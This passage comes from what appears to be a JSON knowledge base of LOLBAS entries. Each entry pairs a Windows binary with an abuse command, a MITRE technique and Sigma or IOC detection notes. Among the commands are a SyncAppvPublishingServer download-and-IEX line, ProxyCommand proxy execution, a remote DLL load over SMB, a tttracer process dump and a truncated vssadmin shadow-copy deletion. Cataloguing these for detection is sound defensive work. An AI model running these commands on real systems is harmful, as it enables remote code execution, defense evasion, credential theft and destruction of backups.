`ProxyCommand`."}],"references":["https://gtfobins.org/gtfobins/scp/","https://lolbas-project.github.io/lolbas/Binaries/scp/"]},{"id":"lolbas:scriptrunner-exe:0","toolId":"lolbas:scriptrunner-exe","toolName":"Scriptrunner.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Scriptrunner.exe -appvscript {PATH:.exe}","description":"Executes executable","usecase":"Execute binary through proxy binary to evade defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml"},{"type":"IOC","value":"Scriptrunner.exe should not be in use unless App-v is deployed"}],"references":["https://twitter.com/KyleHanslovan/status/914800377580503040","https://twitter.com/NickTyrer/status/914234924655312896","https://github.com/MoooKitty/Code-Execution","https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"]},{"id":"lolbas:scriptrunner-exe:1","toolId":"lolbas:scriptrunner-exe","toolName":"Scriptrunner.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ScriptRunner.exe -appvscript {PATH_SMB:.cmd}","description":"Executes cmd file from remote server","usecase":"Execute binary through proxy binary from external server to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml"},{"type":"IOC","value":"Scriptrunner.exe should not be in use unless App-v is deployed"}],"references":["https://twitter.com/KyleHanslovan/status/914800377580503040","https://twitter.com/NickTyrer/status/914234924655312896","https://github.com/MoooKitty/Code-Execution","https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"]},{"id":"lolbas:setres-exe:0","toolId":"lolbas:setres-exe","toolName":"Setres.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"setres.exe -w 800 -h 600","description":"Sets the resolution and then launches 'choice' command from the working directory.","usecase":"Executes arbitrary code","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\setres.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml"},{"type":"IOC","value":"Unusual location for choice.exe file"},{"type":"IOC","value":"Process created from choice.com binary"},{"type":"IOC","value":"Existence of choice.cmd file"}],"references":["https://twitter.com/0gtweet/status/1583356502340870144","https://lolbas-project.github.io/lolbas/Binaries/Setres/"]},{"id":"lolbas:settingsynchost-exe:0","toolId":"lolbas:settingsynchost-exe","toolName":"SettingSyncHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SettingSyncHost -LoadAndRunDiagScript {PATH:.exe}","description":"Execute file specified in %COMSPEC%","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml"},{"type":"IOC","value":"SettingSyncHost.exe should not be run on a normal workstation"}],"references":["https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"]},{"id":"lolbas:settingsynchost-exe:1","toolId":"lolbas:settingsynchost-exe","toolName":"SettingSyncHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat}","description":"Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\\Windows\\System32.","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml"},{"type":"IOC","value":"SettingSyncHost.exe should not be run on a normal workstation"}],"references":["https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"]},{"id":"lolbas:sftp-exe:0","toolId":"lolbas:sftp-exe","toolName":"Sftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"sftp -o ProxyCommand=\"{CMD}\" .","description":"Spawns ssh.exe which in turn spawns the specified command line. See also this project's entry for ssh.exe.","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"sftp.exe executions with ProxyCommand on the command line"},{"type":"IOC","value":"sftp.exe spawning ssh.exe with ProxyCommand on the command line"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/pull/5414/files"}],"references":["https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/","https://lolbas-project.github.io/lolbas/Binaries/Sftp/"]},{"id":"lolbas:sftp-exe:1","toolId":"lolbas:sftp-exe","toolName":"Sftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"sftp -D \"{CMD}\"","description":"Spawns ssh.exe which in turn spawns the specified command line. See also this project's entry for ssh.exe.","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"sftp.exe executions with ProxyCommand on the command line"},{"type":"IOC","value":"sftp.exe spawning ssh.exe with ProxyCommand on the command line"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/pull/5414/files"}],"references":["https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/","https://lolbas-project.github.io/lolbas/Binaries/Sftp/"]},{"id":"lolbas:sigverif-exe:0","toolId":"lolbas:sigverif-exe","toolName":"Sigverif.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"sigverif.exe","description":"Launch sigverif.exe GUI, click 'Advanced', specify arbitrary executable path as 'log file name', then click 'View Log' to execute the binary.","usecase":"Execute arbitrary programs through a trusted Microsoft-signed binary to bypass application whitelisting.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sigverif.exe","C:\\Windows\\SysWOW64\\sigverif.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"sigverif.exe spawning unexpected child processes"}],"references":["https://twitter.com/0gtweet/status/1457676633809330184","https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Sigverif/"]},{"id":"lolbas:ssh-exe:0","toolId":"lolbas:ssh-exe","toolName":"ssh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ssh localhost \"{CMD}\"","description":"Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.","usecase":"Execute specified command, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"type":"IOC","value":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"type":"IOC","value":"command line arguments specifying execution."}],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"]},{"id":"lolbas:ssh-exe:1","toolId":"lolbas:ssh-exe","toolName":"ssh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ssh -o ProxyCommand=\"{CMD}\" .","description":"Executes specified command from ssh.exe","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"type":"IOC","value":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"type":"IOC","value":"command line arguments specifying execution."}],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"]},{"id":"lolbas:ssh-exe:2","toolId":"lolbas:ssh-exe","toolName":"ssh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ssh -o PKCS11Provider=\"\\\\\\\\127.0.0.1\\\\Temp\\\\example.dll\" win@github.com","description":"Executes a DLL from an SMB share by abusing the PKCS11Provider option. The payload executes upon DLL load (DllMain) and requires exporting C_GetFunctionList to prevent premature termination by `ssh.exe`. Note that all backslashes should be escaped (i.e. every `\\` should be turned into `\\\\`).","usecase":"Performs indirect execution of a specified DLL from a remote share, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"type":"IOC","value":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"type":"IOC","value":"command line arguments specifying execution."}],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"]},{"id":"lolbas:stordiag-exe:0","toolId":"lolbas:stordiag-exe","toolName":"Stordiag.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"stordiag.exe","description":"Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.","usecase":"Possible defence evasion purposes.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml"},{"type":"IOC","value":"systeminfo.exe, fltmc.exe or schtasks.exe or powershell.exe being executed outside of their normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://twitter.com/eral4m/status/1451112385041911809","https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"]},{"id":"lolbas:stordiag-exe:1","toolId":"lolbas:stordiag-exe","toolName":"Stordiag.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"stordiag.exe","description":"Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.","usecase":"Possible defence evasion purposes.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml"},{"type":"IOC","value":"systeminfo.exe, fltmc.exe or schtasks.exe or powershell.exe being executed outside of their normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://twitter.com/eral4m/status/1451112385041911809","https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"]},{"id":"lolbas:syncappvpublishingserver-exe:0","toolId":"lolbas:syncappvpublishingserver-exe","toolName":"SyncAppvPublishingServer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX\"","description":"Example command on how inject Powershell code into the process","usecase":"Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.exe","C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml"},{"type":"IOC","value":"SyncAppvPublishingServer.exe should never be in use unless App-V is deployed"}],"references":["https://twitter.com/monoxgas/status/895045566090010624","https://lolbas-project.github.io/lolbas/Binaries/SyncAppvPublishingServer/"]},{"id":"lolbas:tar-exe:0","toolId":"lolbas:tar-exe","toolName":"Tar.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"tar -cf {PATH}:ads {PATH_ABSOLUTE:folder}","description":"Compress one or more files to an alternate data stream (ADS).","usecase":"Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"type":"IOC","value":"tar.exe extracting files from a remote host within the environment"},{"type":"IOC","value":"Abnormal processes spawning tar.exe"},{"type":"IOC","value":"tar.exe interacting with alternate data streams (ADS)"}],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"]},{"id":"lolbas:tar-exe:1","toolId":"lolbas:tar-exe","toolName":"Tar.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"tar -xf {PATH}:ads","description":"Decompress a compressed file from an alternate data stream (ADS).","usecase":"Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"type":"IOC","value":"tar.exe extracting files from a remote host within the environment"},{"type":"IOC","value":"Abnormal processes spawning tar.exe"},{"type":"IOC","value":"tar.exe interacting with alternate data streams (ADS)"}],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"]},{"id":"lolbas:tar-exe:2","toolId":"lolbas:tar-exe","toolName":"Tar.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"tar -xf {PATH_SMB:.tar}","description":"Extracts archive.tar from the remote (internal) host to the current host.","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"type":"IOC","value":"tar.exe extracting files from a remote host within the environment"},{"type":"IOC","value":"Abnormal processes spawning tar.exe"},{"type":"IOC","value":"tar.exe interacting with alternate data streams (ADS)"}],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"]},{"id":"lolbas:ttdinject-exe:0","toolId":"lolbas:ttdinject-exe","toolName":"Ttdinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"TTDInject.exe /ClientParams \"7 tmp.run 0 0 0 0 0 0 0 0 0 0\" /Launch \"{PATH:.exe}\"","description":"Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.","usecase":"Spawn process using other binary","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml"},{"type":"IOC","value":"Parent child relationship. Ttdinject.exe parent for executed command"},{"type":"IOC","value":"Multiple queries made to the IFEO registry key of an untrusted executable (Ex. \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\payload.exe\") from the ttdinject.exe process"}],"references":["https://twitter.com/Oddvarmoe/status/1196333160470138880","https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"]},{"id":"lolbas:ttdinject-exe:1","toolId":"lolbas:ttdinject-exe","toolName":"Ttdinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams \"7 tmp.run 0 0 0 0 0 0 0 0 0 0\" /launch \"{PATH:.exe}\"","description":"Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.","usecase":"Spawn process using other binary","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml"},{"type":"IOC","value":"Parent child relationship. Ttdinject.exe parent for executed command"},{"type":"IOC","value":"Multiple queries made to the IFEO registry key of an untrusted executable (Ex. \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\payload.exe\") from the ttdinject.exe process"}],"references":["https://twitter.com/Oddvarmoe/status/1196333160470138880","https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"]},{"id":"lolbas:tttracer-exe:0","toolId":"lolbas:tttracer-exe","toolName":"Tttracer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"tttracer.exe {PATH_ABSOLUTE:.exe}","description":"Execute specified executable from tttracer.exe. Requires administrator privileges.","usecase":"Spawn process using other binary","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Parent child relationship. Tttracer parent for executed command"}],"references":["https://twitter.com/oulusoyum/status/1191329746069655553","https://twitter.com/mattifestation/status/1196390321783025666","https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html","https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"]},{"id":"lolbas:tttracer-exe:1","toolId":"lolbas:tttracer-exe","toolName":"Tttracer.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"TTTracer.exe -dumpFull -attach {PID}","description":"Dumps process using tttracer.exe. Requires administrator privileges","usecase":"Dump process by PID","mitre":["T1003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Parent child relationship. Tttracer parent for executed command"}],"references":["https://twitter.com/oulusoyum/status/1191329746069655553","https://twitter.com/mattifestation/status/1196390321783025666","https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html","https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"]},{"id":"lolbas:unregmp2-exe:0","toolId":"lolbas:unregmp2-exe","toolName":"Unregmp2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rmdir %temp%\\lolbin /s /q 2>nul & mkdir \"%temp%\\lolbin\\Windows Media Player\" & copy C:\\Windows\\System32\\calc.exe \"%temp%\\lolbin\\Windows Media Player\\wmpnscfg.exe\" >nul && cmd /V /C \"set \"ProgramW6432=%temp%\\lolbin\" && unregmp2.exe /HideWMP\"","description":"Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path '%ProgramW6432%\\wmpnscfg.exe'.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\unregmp2.exe","C:\\Windows\\SysWOW64\\unregmp2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml"},{"type":"IOC","value":"Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`"}],"references":["https://twitter.com/notwhickey/status/1466588365336293385","https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/"]},{"id":"lolbas:vbc-exe:0","toolId":"lolbas:vbc-exe","toolName":"vbc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"vbc.exe /target:exe {PATH_ABSOLUTE:.vb}","description":"Binary file used by .NET to compile Visual Basic code to an executable.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"]},{"id":"lolbas:vbc-exe:1","toolId":"lolbas:vbc-exe","toolName":"vbc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb}","description":"Binary file used by .NET to compile Visual Basic code to an executable.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"]},{"id":"lolbas:verclsid-exe:0","toolId":"lolbas:verclsid-exe","toolName":"Verclsid.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"verclsid.exe /S /C {CLSID}","description":"Used to verify a COM object before it is instantiated by Windows Explorer","usecase":"Run a COM object created in registry to evade defensive counter measures","mitre":["T1218.012"],"privilege":"user","fullPath":["C:\\Windows\\System32\\verclsid.exe","C:\\Windows\\SysWOW64\\verclsid.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml"}],"references":["https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"]},{"id":"lolbas:vssadmin-exe:0","toolId":"lolbas:vssadmin-exe","toolName":"Vssadmin.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"vssadmin delete shadows 